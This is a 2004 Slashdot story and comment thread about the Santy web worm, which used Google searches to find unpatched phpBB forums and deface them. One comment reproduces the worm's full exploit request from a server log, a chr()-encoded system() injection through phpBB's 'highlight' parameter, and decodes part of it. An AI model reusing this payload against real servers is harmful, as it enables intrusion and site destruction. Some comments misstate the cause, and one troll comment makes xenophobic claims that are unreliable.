×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Net Worm Uses Google to Spread

michael posted more than 9 years ago | from the web-service-takes-on-new-meaning dept.

Worms 309

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

309 comments

Quick! (5, Funny)

Anonymous Coward | more than 9 years ago | (#11153152)

Someone figure out a way to blame this on Microsoft!

Re:Quick! (1)

ackthpt (218170) | more than 9 years ago | (#11153407)

Someone figure out a way to blame this on Microsoft!

Yeah, right. Just get out your old Fido Board.

Likely Source of Problem: China, not Microsoft (-1, Troll)

Anonymous Coward | more than 9 years ago | (#11153439)

The likely source of the culprit is China [phrusa.org]. It generates most of the spam, viruses, and malware.

Not surprisingly, Google is the carrier for spreading the infection. Google has a cozy relationship with Beijing, and many H-1Bs from China (which includes Taiwan province and Hong Kong) work at Google. Note, too, that Google quickly complies with Beijing's censorship demands -- with no questions asked.

Let's do the right "thing" and switch over to Yahoo! Search [yahoo.com].

Re:Quick! (0)

Anonymous Coward | more than 9 years ago | (#11153452)

You must be working for microsoft

Re:Quick! (2, Interesting)

geekopus (130194) | more than 9 years ago | (#11153465)

It might be quite the opposite:

When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable
of finding .html files to deface, and then going to google and finding
more instances of phpbb to infect.

This is from one of the links above. So, it sounds like if a machine doesn't have Perl installed, the thing can't go to work. By sheer coincidence, most windows boxes will be immune to this particular instance of this worm (by not having Perl installed).

That's not to say that it can't be modified to carry a more portable payload. Thank god the payload wasn't itself written in PHP.

Under the Google radar (5, Interesting)

Meostro (788797) | more than 9 years ago | (#11153153)

I saw this yesterday on a.... uhh... "anatomic reference" site:
This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

I tried to find some kind of reference and Googled [google.com] for it, but I got no results.

Still nothing on it, wonder how long it'll be before it shows up?

MSN search [msn.com] returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta [msn.com] engine for the article.

Re:Under the Google radar (0, Offtopic)

swordboy (472941) | more than 9 years ago | (#11153181)

Still nothing on it, wonder how long it'll be before it shows up?

NeverEverNoSanity WebWorm generation 11 [eicar.org]

Re:Under the Google radar (-1, Troll)

kevin_conaway (585204) | more than 9 years ago | (#11153411)

Dont click on that link. You'll get infected.

Re:Under the Google radar (1)

Gogo Dodo (129808) | more than 9 years ago | (#11153509)

"Infected" with nothing. That's the EICAR test virus to make sure your antivirus software is working properly.

Re:Under the Google radar (1)

Asgard (60200) | more than 9 years ago | (#11153526)

eicar is a standard virus-detection test string. It isn't actually virus.

Re:Under the Google radar (2, Informative)

Anonymous Coward | more than 9 years ago | (#11153425)

umm.. that's just the eicar.com AV test file.. not really a virus - just a file that sets off your AV software so you know it's working. why is this informative?

Re:Under the Google radar (1, Funny)

ad0gg (594412) | more than 9 years ago | (#11153261)

Google takes a while to get information into the index usually a couple weeks(this doesn't apply to news sites or other sites google deems to be updated constantly), MSN beta search usually lags about a day after a crawl. I won't even talk about how slow yahoo is(After first crawl and index).

Re:Under the Google radar (2, Funny)

northcat (827059) | more than 9 years ago | (#11153531)

OMG! How is parent funny?!? Is this some bizzare experiment by slashdot mods?

Re:Under the Google radar (2, Informative)

rednip (186217) | more than 9 years ago | (#11153282)

even better, I did a search on the beta msn site for 'NeverEverNoSanity WebWorm generation' [msn.com], the best that I got as a search result was 20 (well the first couple of pages), but the site read 11 when I went to it, I suppose that the worm is writing over it's own defacement.

Re:Under the Google radar (1)

mavi_yelken (801565) | more than 9 years ago | (#11153598)

I found generation 24, but when I clicked the link a normal site appeared. it seems that a quick fix does the trick.

Likely Source of Culprit: China (-1, Troll)

Anonymous Coward | more than 9 years ago | (#11153285)

The likely source of the culprit is China [phrusa.org]. It generates most of the spam, viruses, and malware.

Not surprisingly, Google is the carrier for spreading the infection. Google has a cozy relationship with Beijing, and many H-1Bs from China (which includes Taiwan province and Hong Kong) work at Google. Note, too, that Google quickly complies with Beijing's censorship demands -- with no questions asked.

Let's do the right "thing" and switch over to Yahoo! Search [yahoo.com].

Lycos generates an error (1)

John3 (85454) | more than 9 years ago | (#11153545)

Search for' NeverEverNoSanity' on Lycos and you get a JScript error:

Microsoft JScript runtime error '800a1391'
'cTabTypeMulti' is undefined /common/static/error.inc, line 49

Re:Under the Google radar (5, Informative)

orangesquid (79734) | more than 9 years ago | (#11153609)

You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22Never EverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
0, 1, 2, 3 - no hits
4 - 2335 hits
5 - 9297 hits
6 - 7218 hits
7 - 7288 hits
8 - 10746 hits
9 - 12009 hits
10 - 11752 hits
11 - 14866 hits
12 - 13267 hits
13 - 8393 hits
14 - 13317 hits
15 - 3840 hits
16 - 5004 hits
17 - 1950 hits
18 - 3344 hits
19 - 6 hits
20 - 1 hit
21 - 3 hits
22 - 1 hit
23 - 1 hit
24 - 1 hit
25, 26, 27, 28, 29, 30 - no hits

Note to worm writers (-1)

Anonymous Coward | more than 9 years ago | (#11153154)

Don't use Google. Yes, it's easy, but they catch on quick and disable that search. Notice not even NeverEverNoSanity [google.com] works now.

Re:Note to worm writers (0)

Anonymous Coward | more than 9 years ago | (#11153312)

RTFP dumbass

Head line is way to misleading (5, Informative)

mkop (714476) | more than 9 years ago | (#11153155)

There is nothing wrong with google. only with people who have not pathced the php buletin boards

Re:Head line is way to misleading (5, Informative)

taylortbb (759869) | more than 9 years ago | (#11153322)

Actually, it doesn't have to do with unpatched phpBB installations. It has to do with unpatched PHP installations.

phpBB has an explanation of what the problem is, it can be found at:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=24 8046 [phpbb.com]

OTHER FORUMS ARE VULNERABLE

(and no, I am not a phpBB zealot, I am pointing out a misconception)

Re:Head line is way to misleading (1)

gotacap (663393) | more than 9 years ago | (#11153373)

no, other boards are vunerable to OTHER cracks. This particular worm effects a vunerability in phpBB. If you upgrade your copy of php, but not phpBB you are still vunerable. If you use phpBB upgrade to 2.0.11, do it... do it now!

Re:Head line is way to misleading (1)

taylortbb (759869) | more than 9 years ago | (#11153390)

Although the cracks may not use this exact exploit they all revolve around the same security failing in PHP.

Re:Head line is way to misleading (2, Informative)

a16 (783096) | more than 9 years ago | (#11153610)

No, what you are saying is false. The phpBB 2.0.10 security issue is not related in any way to the PHP exploits discovered recently. And this worm uses the 2.0.10 exploits, not PHP.

Poor /. (5, Funny)

roman_mir (125474) | more than 9 years ago | (#11153157)

I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

NeverEverNoSanity (0)

Reducer2001 (197985) | more than 9 years ago | (#11153163)

Google must have turned this off. It's returning 0 hits now.

Re:NeverEverNoSanity (0)

Anonymous Coward | more than 9 years ago | (#11153216)

No, you are searching for sites that have already been defaced. Google is just incredibly slow to index, at least compared to the MSN search, which turns up 39,000 hits.

Re:NeverEverNoSanity (1, Interesting)

Anonymous Coward | more than 9 years ago | (#11153298)

That is only part of it. All the sites in MSN search are IIS sites. IIS actually sends info to MSN search (Wehter you want it to or not). While IIS has a small % of the web, it is still some 20%.

Re:NeverEverNoSanity (3, Informative)

Loether (769074) | more than 9 years ago | (#11153406)

The virus is searching google for sites not yet infected. Googling [google.com] for "Powered by phpBB" does return results. Some of which are now defaced.

If google wants to stop the virus then they could disable "Powered by phpBB" as a search term. The reason "NeverEverNoSanity" doesn't come up on google is becuase googlebot is extreamly slow to index new content on most sites.

Re:NeverEverNoSanity (0)

Anonymous Coward | more than 9 years ago | (#11153492)

mod -1 retarded

Latest Version of phpBB Unaffected (5, Informative)

akiy (56302) | more than 9 years ago | (#11153168)

It looks like the latest phpBB version 2.0.11 [phpbb.com]or a simple patch [phpbb.com] will thwart the worm, though. Time to upgrade if you haven't yet!

Re:Latest Version of phpBB Unaffected (2, Insightful)

MightyMartian (840721) | more than 9 years ago | (#11153264)

> It looks like the latest phpBB version 2.0.11 or a simple patch will thwart
> the worm, though. Time to upgrade if you haven't yet!

That's alright. All the lazy admins will blame Google and everything will be okay!

This, I suspect, is going to be a new way of infecting web-based apps. Just do a search for the vulnerable software on Google, Yahoo or whatever, pop in, do your damage and be on your way.

Of course, it will get much worse if its some sort of E-commerce software or something like that and these worms happily start stealing credit card transactions.

Re:Latest Version of phpBB Unaffected (4, Insightful)

topynate (694371) | more than 9 years ago | (#11153308)

Given that probably 90% of script kiddies find targets with Google, it could only be a matter of time before someone automated the process.

Maybe it's a theme - the worms of tomorrow will do what the script kiddies of today do.

Re:Latest Version of phpBB Unaffected (5, Informative)

Cutriss (262920) | more than 9 years ago | (#11153278)

Yes and no.

It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.

Re:Latest Version of phpBB Unaffected (2, Funny)

Martin Blank (154261) | more than 9 years ago | (#11153354)

Good job. You do know that by Slashdotting the phpBB.com server, you're preventing people from patching, right? :)

And in a complete upset (4, Funny)

Marxist Hacker 42 (638312) | more than 9 years ago | (#11153178)

Microsoft search beats Google at indexing pages hacked by this virus! MS Search turns up 39000 pages, google turns up zero on the same nonsense keyword!

Re:And in a complete upset (0)

Anonymous Coward | more than 9 years ago | (#11153458)

Uh, I just searched at MSN using their search
window, and it turned up 3 hits, two of which
appear to have recovered already.

Infect Slashdot (5, Funny)

somethinghollow (530478) | more than 9 years ago | (#11153179)

When it infects sites running SlashCode, it pretends to be a legitament post (so it can get the defacement tag "NeverEverNoSanity" on the front page, then monitors for posting, and tries to get first post, too.

It works both ways. (0)

mikeophile (647318) | more than 9 years ago | (#11153225)

Google API's can be used for good or evil.

Re:It works both ways. (1)

gl4ss (559668) | more than 9 years ago | (#11153506)

googleapi is just a convinient helper in all this.

besides, i doubt it wouldn't use it.. as to use it you need to have a code and they could just turn that key off(and there's some 1000 limit on one key, or at least should have).

so.. what i'm saying is that you don't really need the googleapi for doing regular google searches you could do via http.......

Hmmmm (0)

sadcox (173714) | more than 9 years ago | (#11153229)

Looks like it's actually a php problem, not a phpBB problem--or did I read it wrong?

From phpBB.com

Recently a serious exploitable issue was discovered in PHP (the scripting language in which phpBB, IPB, vB, etc. are written) versions prior to 4.3.10. The problematical functions include unserialize and realpath. phpBB (along with a great many other scripts including IPB, vB, etc.) use these two functions as a matter of course.

It has come to our attention that code has now been released which uses this exploit in PHP to obtain confidential information in phpBB. Such information includes data contained in phpBB's config.php file. We therefore recommend the following:

1) If you maintain your own server be sure to upgrade to the newest available release of PHP (both versions 4 and 5). Be aware that at this time phpBB 2.0.x has problems functioning under PHP5 without modification.

2) If you pay for hosting ensure you hosting provider has upgraded thier installation of PHP (again remember that phpBB 2.0.x and other scripts will not function under PHP5 without modification).

Please do not submit this PHP issue to our security tracker, it is beyond our control. Fixed versions of PHP do exist and as above we encourage you to ensure your system is running such a version. Equally please examine any "hacking" issues you have carefully to ensure they are not caused by this PHP problem (rather than phpBB). Remember, this is not a phpBB exploit or problem, it's a PHP issue and thus can affect any PHP script which uses the noted functions.

Re:Hmmmm (3, Informative)

Sikmaz (686372) | more than 9 years ago | (#11153313)

Different Exploit, that is a seperate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10

Not PHP Bugs - phpBB exploit is used (5, Informative)

a16 (783096) | more than 9 years ago | (#11153582)

As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

Re:Hmmmm (1)

TheRagingTowel (724266) | more than 9 years ago | (#11153433)

I got this from lunarpages:
Hello,

Lunarpages wants to clarify some confusion regarding current exploits involving PHP and PHPbb.

Recently we emailed all customers notifying them to make sure to upgrade their PHPbb (a third party application bulletin board) to the latest version as there are known, serious exploits on any version lower that 2.0.11. This must be done. We are seeing many customers who are having problems with their boards getting hacked because they have not upgraded. Please see the following articles for more information on this: http://www.kaspersky.com/news?id=156681162 or http://www.phpbb.com/phpBB/viewtopic.php?t=248811& highlight=worm.

Also, there is a known exploit in PHP itself (the programming language). Lunarpages is diligently working to upgrade all servers to the latest version of PHP and Zend Optimizer. We are upgrading to PHP version 4.3.10 and Zend Optimizer to version 2.5.7. These are completely separate issues. Just upgrading PHP on the servers to the current version will not fix exploits in PHPbb. We have yet to see any serious issues regarding the PHP exploit however; we will still ensure we have the latest, most secure version available.

PHPbb boards running versions less than 2.0.11 must be upgraded. It is imperative that this email is not ignored and that all customers who run a PHPbb board upgrade immediately to protect the integrity of their site.

Please note that it is your responsibility to keep current backups of your site and that you should always back up your site before any major change. Lunarpages can supply a backup to you. However, restoring a site is charged at $75.00 per hour. To get a quote for this or for questions or concerns regarding this email, please contact support@lunarpages.com.

Thank you for your immediate attention to this matter.

Lunarpages Support

Re:Hmmmm (0)

Anonymous Coward | more than 9 years ago | (#11153451)

That's the recent PHP bug, but the Santy worm actually uses the older phpBB highlight SQL injection (11/19/4). See the crafted URL that was posted to bugtraq yesterday: http://www.securityfocus.com/archive/1/385063/2004 -12-18/2004-12-24/0

A few things.. (0)

Flaming_cows (798162) | more than 9 years ago | (#11153233)

First of all, the exploit is in PHP (see here [theinquirer.net]), not phpBB, the worm just happens to attack phpBB. I just think that should be cleared up before people start spreading FUD about how phpBB is insecure.

Secondly, this issue has been patched for a month now (see this announcement [phpbb.com]) and the phpBB group has reminded users several times to upgrade.

Dshield disagrees (3, Insightful)

JustinXB (756624) | more than 9 years ago | (#11153334)

See here [sans.org]
Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case.
Who are you going to believe: Some news site or a security community?

Different Exploit (1)

Sikmaz (686372) | more than 9 years ago | (#11153356)

As I posted above, that is a seperate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10

Re:Different Exploit (1)

Sikmaz (686372) | more than 9 years ago | (#11153378)

Err crap, I shouldn't have copied and pasted my post isn't entirely clear in this context ;) This worm exploits a problem in PHPBB 2.0.10 that is fixed in 2.0.11. The other issue is a PHP problem that can be solved via the work around I posted above or using PHP 4.3.10.

Re:A few things.. (2, Interesting)

psyon1 (572136) | more than 9 years ago | (#11153422)

No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that php so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didnt state for certain. As far as I know, no one has yet to release an exploit for the bugs, its just a possibility.

Re:A few things.. (1)

infiniteedge (634048) | more than 9 years ago | (#11153522)

please mod down the parent, that is incorrect. the problem is NOT in PHP, it is in an old version of phpBB.

http://www.f-secure.com/v-descs/santy_a.shtml

Re:A few things.. (1)

Flaming_cows (798162) | more than 9 years ago | (#11153585)

Odd, that's not what topics on phpBB.com say, but I guess you may be right. Regardless, the issue was patched a month ago and people have been reminded to upgrade many times.

My site (0)

Anonymous Coward | more than 9 years ago | (#11153234)

This worm hit my site (http://www.koolplace.com) yesterday. It replaced all of the .htm, .html, and .php files with a message that the site had been defaced. Thankfully we were able to restore most of the site from backups.

I got hit HARD! :( (5, Interesting)

Broadband (602443) | more than 9 years ago | (#11153238)

This worm is unbelieveably evil.

What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

-BB

Re:I got hit HARD! :( (1)

PitaBred (632671) | more than 9 years ago | (#11153303)

Unlucky generation 13, eh? I heard it was worse than the others.
Yes, it was a lame joke. I couldn't think of anything better :(

Re:I got hit HARD! :( (1)

KhaZ (160984) | more than 9 years ago | (#11153315)


I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.


You kind of point out in that sentence along that your drive wasn't secure, now was it? :).

Best thing I can recommend, is use some sort of RCS, (http://www.perforce.com/ [perforce.com] is great for up to two people, free!), and then make a checkpoint or a targz of it nightly.

Re:I got hit HARD! :( (2, Informative)

Anonymous Coward | more than 9 years ago | (#11153434)

That's why I don't call it a backup if it's hot. If you just put in a second drive, it doesn't save you from 'rm -rf /' or from a power supply that commits suicide... and decides to take the rest of the hardware with it.

Backups are on cold hardware, on a shelf. At the minimum. Preferably in another building.

Re:I got hit HARD! :( (1)

the_rev_matt (239420) | more than 9 years ago | (#11153442)

If your backup was unshared and secure it wouldn't have been overwritten. Keeping a backup on the same machine is the same as not having a backup. I would argue that keeping a backup on the same subnet is the same as not having a backup.

Ehhh.. Tape drive perhaps?? (2, Insightful)

scsirob (246572) | more than 9 years ago | (#11153444)

This is the main issue with harddisks as backup. They don't provide security against these kind of attacks as they are just as vulnerable as any other disk attached to the system.

A tape drive for backups may seem like a 'thing from the past', but it's *very* effective in these instances...

Re:Ehhh.. Tape drive perhaps?? (1)

pembo13 (770295) | more than 9 years ago | (#11153554)

What about an IDE HDD in a external drive case (USB)? That's what I use, but I don't have much to spend.

Re:Ehhh.. Tape drive perhaps?? (1)

biz0r (656300) | more than 9 years ago | (#11153602)

Forgive me if I am wrong (although pretty damn sure I am right)...but the primary difference between a tape drive and a hard drive is the method and times in which they are accessed. A hard drive (usually) is just a locally mounted file storage device which is accessed via a certain directory through the normal methods. A tape drive, has many options as to how it is used, but the primary reason it would be unaffected versus a hard drive, is that the tape drive is unmounted/disconnected from main/general access (atleast most of the time).

Solution? Unmount any backup drives when you are not doing any backups...I don't care that it's mounted in such a way that only root can access it, it's still dangerous (for backup purposes).

Re:Ehhh.. Tape drive perhaps?? (4, Informative)

Zen Punk (785385) | more than 9 years ago | (#11153604)

Nonsense. A hard drive on the shelf, in the safe, whatever, is no more vulnerable than a tape on the shelf. If you left your backup tape mounted all the time, it would be just as insecure as adding a second drive and calling it a "backup."

Re:I got hit HARD! :( (1)

Broadband (602443) | more than 9 years ago | (#11153536)

I'm well aware that it wasn't the best form of backup and the funny thing is I just reinstalled the machine and OS and the 2nd drive was an identical mirror. That was 7 days ago. I thought to myself. I'll back up to physical media this weekend. What's the chances I could lose that data in 7 days. I learned my lesson :P Forutnately i do have backups they just aren't as easy as a copy since their on varios medias. What a great Christmas Gift eh?

Here's one (0)

Anonymous Coward | more than 9 years ago | (#11153320)

http://chat.ravenlive.com

My Christmas gift! Noooooo! (2, Funny)

286 (620933) | more than 9 years ago | (#11153401)

So I get my present, in the mail, a little early.
A new HDTV card...
I go to download [pchdtv.com] the linux only drivers and...

NeverEverNoSanity!!!

Argh! &$@*#! Humbug.

Re:My Christmas gift! Noooooo! (1)

picklepuss (749206) | more than 9 years ago | (#11153667)

I just noticed that same thing... except I was thinking about ordering one.

Now I'm not sure I'm going to. People complaining because the drivers are out of date or don't work correctly, and I realize that they seldom check their own forums (user PCHDTVTech has just 2 posts ever)... an unpatched phpBB and they're just adding more straw to a broken camel

Did someone see the google ad ? (1)

yogikoudou (806237) | more than 9 years ago | (#11153418)

Ad under the article says :
Own a website ? Google.
Why not Website pwn3d ? Google.

Santy Worm (0)

Anonymous Coward | more than 9 years ago | (#11153441)

...the defacement text that the Santy worm...


Ho Ho Ho, remember kids, Santy Worm knows if you've been bad or good...

For all of you saying it's a PHP exploit (5, Informative)

VeneficusAcerbus (724294) | more than 9 years ago | (#11153456)

From ISC:
Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, its still a good idea to update php.

I got hit (2, Insightful)

Ghoser777 (113623) | more than 9 years ago | (#11153459)

My poor linux box - I felt so secure and then this little worm gets out. Thank god I had some recent backups, otherwise this would have really sucked. I guess it's alright though - you have to get rooted one time before you really understand how vulnerable the internet makes all of us.

Why MSN works and Google Doesn't (1)

infiniteedge (634048) | more than 9 years ago | (#11153483)

The reason is simple. Microsoft, being the Good Guys, stopped responding to that query to stop the spread of the worm. The worm was dependent on Google to return vunerable servers via a search query. So Google has temporarily stopping responding to that search. MSN wasn't targeted by the worm because real hackers all know Google is the best :-). However, in this case would MSN have reacted as fast as Google did? Should the coder have picked MSN to get a longer lasting worm?

address tag and no robots (1)

99BottlesOfBeerInMyF (813746) | more than 9 years ago | (#11153484)

I looked at a defaced page and there were two things I noticed. The first was that the worm does not seem to create a robots.txt file to hide defaced pages from search engines. Second, the majority of the text is contained in an ADDRESS, HTML tag. It is a valid tag, but does anyone actually use it? I have not seen it before as far as I can recall.

Re:address tag and no robots (2, Informative)

daten (575013) | more than 9 years ago | (#11153583)

The ADDRESS element may be used by authors to supply contact information for a document or a major part of a document such as a form. This element often appears at the beginning or end of a document.

http://www.w3.org/TR/html401/struct/global.html#ed ef-ADDRESS [w3.org]

I've used it for years. By the way, how often do you review the html source of webpages you visit?

Re:address tag and no robots (1)

99BottlesOfBeerInMyF (813746) | more than 9 years ago | (#11153665)

By the way, how often do you review the html source of webpages you visit?

Occasionally. I have also edited quite a few different ones for one reason or another. I was not meaning to imply that it was not valid. I was just wondering if it was obscure and unused, or just something I have not run across. It still seems an odd inclusion in a page created by a worm.

Relating to this, I wonder, is there any way to get google to search based upon html tags? For example, could I find all pages with address tags.

Distribution security updates to PHP? (0, Offtopic)

errorlevel (415281) | more than 9 years ago | (#11153507)

Does anybody know what distributions are affected by this vulnerability?

The last PHP update (which is where the vulnerability lies) for Debian Woody is from July 20th.

Re:Distribution security updates to PHP? (1)

lightdarkness (791960) | more than 9 years ago | (#11153524)

If I recall correctly, the bug that is being exploited is just phpBB specific, and not pertaining to PHP itself.

There have, in recent days, been exploits found in PHP that phpBB uses, but I don't believe those have been exploited on a mass scale.

Get 4.3.10+ (1)

D_Lehman(at)ISPAN.or (799775) | more than 9 years ago | (#11153584)

It fixes many exploit paths, and fixes handling of the $PHP_SELF variable. $PHP_SELF is potentially vulnerable to cross site scripting on versions 4.3.9 and earlier. This is part of the problem, as I understand it, with some phpBB exploits.

You are also good to go if you get 5.0.3, or so I have heard.

The Robot Threat (2, Informative)

D_Lehman(at)ISPAN.or (799775) | more than 9 years ago | (#11153546)

Robots aren't bad, they help people find things, and get them to your site. However, if you would rather keep them away from you, consider using your robots.txt http://www.robotstxt.org/ [robotstxt.org] along with meta tags on pages. You can also set certain content to be filtered out by looking at the connecting agent. Things you should consider filtering out would be admin links/pages, version numbers (often in the footer of pages), and files that aren't related to content. There's no reason for Google to know what your login pages look like, for instance.

If I've said it once, I've said it 1000 times. When you secure the old tech first, you find fewer problems with the new tech. robots.txt, .htaccess, proper chmod/chown... these are the things that can prevent a new bug from being a really bad new bug.

ouch, thats a nasty one! (1)

museumpeace (735109) | more than 9 years ago | (#11153579)

google found nothing, MSN search found this
Results 1-3 of about 3 containing ""WebWorm Generation""







1. This site is defaced!!!
This site is defaced!!! NeverEverNoSanity WebWorm generation 5.
www.videocardforum.com

2. This site is defaced!!!
This site is defaced!!! NeverEverNoSanity WebWorm generation 8.
www.dslwebserver.com/main/sbs-zonealarm-configure. html
3. This site is defaced!!!
This site is defaced!!! NeverEverNoSanity WebWorm generation 11.
sprites.planet-megaman.com/credits.shtml
when asked to find "Webworm Generation". But why only 3 if thousands were reported in the art.? Maybe the sysadmins all cleaned things up in the last 1/2 hour?
Mountain View...I think we have a problem....

Santy.A Claus is Coming! (1)

Stanistani (808333) | more than 9 years ago | (#11153597)

Headline from Computerworld [computerworld.com]:

New worm, Santy.A, using Google to spread

He sees you when you're posting, he knows when you write spam, he hates it when you flame users, so be good for goodness' sake!

This one's fun to debug - perl via url (5, Interesting)

falzbro (468756) | more than 9 years ago | (#11153607)

I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

Here's the first line from the logfile:
[20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

If you decode the ascii characters [asciitable.com], you get:

perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

--falz

NeverEverNoSanta (1, Funny)

Anonymous Coward | more than 9 years ago | (#11153612)

"Once Santa infects a Web site, he searches Google for other sites running phpBB and then attempts to infect those sites as well."

And so it comes full circle... (1)

MoeMoe (659154) | more than 9 years ago | (#11153629)

It seems one of the webcomics I read, UnderPower, got affected as well... It also happens to be linked here on Slashdot...

Black background, red lettering:

This site is defaced!!!
NeverEverNoSanity WebWorm generation 14.

MSN actually returns 207 results (3, Informative)

bharatman (253051) | more than 9 years ago | (#11153652)


MSN's first page estimates are always grossly inflated. Try this link instead:

http://beta.search.msn.com/results.aspx?q=NeverE ve rNoSanity&first=200&count=10&FORM=PERE4

Note that I the "first" param is 200 (which is the equivalent of going to page 20). It hits the end of the results and revises its estimate.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...